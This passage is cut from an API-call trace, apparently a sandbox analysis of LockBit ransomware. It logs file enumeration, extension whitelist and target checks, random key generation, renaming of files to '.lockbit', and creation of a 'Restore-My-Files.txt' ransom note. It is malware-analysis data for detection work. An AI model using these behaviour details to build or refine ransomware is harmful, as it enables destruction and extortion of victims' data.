ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6557800, ftLastWriteTime.dwHighDateTime=0x1bd4d57, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19563_.GIF", cAlternateFileName="")) returned 1 [0106.407] lstrcmpiW (lpString1=".", lpString2="BD19563_.GIF") returned -1 [0106.407] lstrcmpiW (lpString1="..", lpString2="BD19563_.GIF") returned -1 [0106.407] PathFindExtensionW (pszPath="BD19563_.GIF") returned=".GIF" [0106.407] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0106.407] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0106.407] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0106.408] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0106.408] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0106.408] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0106.408] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0106.408] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0106.408] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19563_.GIF") returned 1 [0106.408] lstrcmpiW (lpString1="ntldr", lpString2="BD19563_.GIF") returned 1 [0106.408] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19563_.GIF") returned 1 [0106.408] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19563_.GIF") returned 1 [0106.408] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19563_.GIF") returned -1 [0106.408] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19563_.GIF") returned 1 [0106.409] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19563_.GIF") returned 1 [0106.409] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.409] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned=".GIF" [0106.409] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0106.409] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0106.409] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0106.409] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.lockbit") returned 72 [0106.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.411] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.411] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.411] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20454) returned 1 [0106.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.412] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0106.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.419] malloc (_Size=0xa6) returned 0x77d800 [0106.419] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.419] free (_Block=0x77d800) [0106.419] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.420] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.420] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f48c00, ftCreationTime.dwHighDateTime=0x1bd4d56, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe4f48c00, ftLastWriteTime.dwHighDateTime=0x1bd4d56, nFileSizeHigh=0x0, nFileSizeLow=0x3d75, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19582_.GIF", cAlternateFileName="")) returned 1 [0106.420] lstrcmpiW (lpString1=".", lpString2="BD19582_.GIF") returned -1 [0106.420] lstrcmpiW (lpString1="..", lpString2="BD19582_.GIF") returned -1 [0106.420] PathFindExtensionW (pszPath="BD19582_.GIF") returned=".GIF" [0106.420] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0106.420] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0106.420] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0106.421] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0106.421] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0106.421] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0106.421] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0106.421] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0106.421] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19582_.GIF") returned 1 [0106.421] lstrcmpiW (lpString1="ntldr", lpString2="BD19582_.GIF") returned 1 [0106.421] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19582_.GIF") returned 1 [0106.421] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19582_.GIF") returned 1 [0106.421] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19582_.GIF") returned -1 [0106.421] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19582_.GIF") returned 1 [0106.422] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19582_.GIF") returned 1 [0106.422] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.422] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned=".GIF" [0106.422] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0106.422] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0106.422] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0106.423] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0106.423] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.lockbit") returned 72 [0106.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.423] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.423] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.423] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15733) returned 1 [0106.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.425] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.431] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.431] malloc (_Size=0xa6) returned 0x77d800 [0106.431] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.434] free (_Block=0x77d800) [0106.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.434] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.434] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c6cc00, ftCreationTime.dwHighDateTime=0x1bd4d5a, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc4c6cc00, ftLastWriteTime.dwHighDateTime=0x1bd4d5a, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19695_.WMF", cAlternateFileName="")) returned 1 [0106.434] lstrcmpiW (lpString1=".", lpString2="BD19695_.WMF") returned -1 [0106.434] lstrcmpiW (lpString1="..", lpString2="BD19695_.WMF") returned -1 [0106.434] PathFindExtensionW (pszPath="BD19695_.WMF") returned=".WMF" [0106.434] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.434] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.435] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19695_.WMF") returned 1 [0106.436] lstrcmpiW (lpString1="ntldr", lpString2="BD19695_.WMF") returned 1 [0106.436] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19695_.WMF") returned 1 [0106.436] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19695_.WMF") returned 1 [0106.436] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19695_.WMF") returned -1 [0106.436] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19695_.WMF") returned 1 [0106.436] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19695_.WMF") returned 1 [0106.436] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.436] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned=".WMF" [0106.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.436] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.436] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 